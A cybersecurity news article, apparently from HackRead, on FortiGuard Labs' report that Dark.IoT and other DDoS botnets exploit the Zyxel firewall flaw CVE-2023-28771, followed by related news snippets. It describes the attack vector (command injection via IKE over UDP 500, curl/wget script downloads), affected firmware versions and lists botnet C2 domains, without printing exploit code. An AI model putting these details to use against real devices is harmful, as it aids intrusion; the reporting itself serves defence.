Headline
Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks
By Waqas The DDoS attacks have been observed in various regions, including Central America, North America, East Asia, and South Asia. This is a post from HackRead.com Read the original post: Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks
The Dark.IoT botnet is a variant based on the Mirai botnet that first surfaced in August 2021 and has since expanded its target beyond IoT devices.
In a recent report, FortiGuard Labs uncovered a concerning rise in Distributed Denial of Service (DDoS) botnets exploiting the Zyxel vulnerability (CVE-2023-28771). The vulnerability, identified with a severity rating of 9.8 on the CVSS scoring system, affects multiple firewall models and allows unauthorized attackers to execute arbitrary code by sending a specially crafted packet to the targeted device.
The Zyxel vulnerability came into the spotlight in June 2023 when FortiGuard Labs detected the propagation of several DDoS botnets taking advantage of this security flaw. The flaw was initially reported by researchers from TRAPA Security, and Zyxel issued a security advisory on April 25, 2023. It was subsequently added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalogue in May 2023.
However, FortiGuard Labs’ recent analysis indicated a significant increase in attack bursts starting from May, with multiple botnets involved, including Dark.IoT, a variant based on the notorious Mirai botnet. Additionally, another botnet employed customized DDoS attack methods.
Researchers were also able to identify the attacker’s IP address, revealing that the attacks occurred in various regions, including Central America, North America, East Asia, and South Asia.
Increasing activity of the botnet (FortiGuard Labs)
The attacks specifically targeted the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices. The attackers utilized tools such as curl or wget to download scripts for further actions. These scripts were tailored for the MIPS architecture, pointing to a highly specific target.
One of the identified botnets, Dark.IoT, made its appearance in 2021 and has since expanded its targeting beyond IoT devices.
The botnet employs the ChaCha20 cryptographic algorithm for encryption and utilizes multiple C2 (Command and Control) servers, including “raw.pastebin.com,” “hoz.1337.cx,” “babaroga.lib,” “dragon.lib,” “blacknurse.lib,” “tempest.lib,” “routercontroller.geek,” and “dvrcontroller.libre.”
The presence of exposed vulnerabilities in devices poses significant risks, as threat actors can gain control over vulnerable devices and incorporate them into their botnets for further attacks, like DDoS assaults.
FortiGuard Labs emphasizes the importance of promptly applying patches and updates to mitigate these risks and ensure the security of IoT devices and Linux servers.
In light of these findings, it is crucial for organizations and users to stay vigilant and take proactive measures to protect their systems from potential exploits. Addressing vulnerabilities promptly is essential in safeguarding against DDoS botnet attacks and other malicious activities targeting vulnerable IoT devices.
As cybersecurity researchers continue to monitor and analyze emerging threats, raising awareness about the importance of security updates and best practices remains vital in safeguarding the digital ecosystem.
- Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
- DDoS Attacks Soar by 168% on Government Services, StormWall
- FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks
- IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia
- Chinese Gang Storm-0558 Hacked European Govt Emails, Microsoft
I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism
Related news
The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a
The out-of-bounds write vulnerability in the Windows-based SecuExtender SSL VPN Client software version 4.0.4.0 could allow an authenticated local user to gain a privilege escalation by sending a crafted CREATE message.
Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023. "22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The
Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems. "Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America,
This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The affected devices are vulnerable in a default configuration and command execution is with root privileges.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday placed two recently disclosed flaws in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities, tracked as CVE-2023-33009 and CVE-2023-33010, are buffer overflow vulnerabilities that could enable an unauthenticated attacker to cause a
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker
By Deeba Ahmed A variant of the Mirai botnet is targeting Zyxel Firewalls after exploiting a newly patched operating system command injection vulnerability. This is a post from HackRead.com Read the original post: Mirai Malware Hits Zyxel Devices After Command Injection Bug
Zyxel has released software updates to address two critical security flaws affecting select firewall and VPN products that could be abused by remote attackers to achieve code execution. Both the flaws – CVE-2023-33009 and CVE-2023-33010 – are buffer overflow vulnerabilities and are rated 9.8 out of 10 on the CVSS scoring system. A brief description of the two issues is below - CVE-2023-33009 -
Networking equipment maker Zyxel has released patches for a critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems. The issue, tracked as CVE-2023-28771, is rated 9.8 on the CVSS scoring system. Researchers from TRAPA Security have been credited with reporting the flaw. "Improper error message handling in some firewall versions
Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.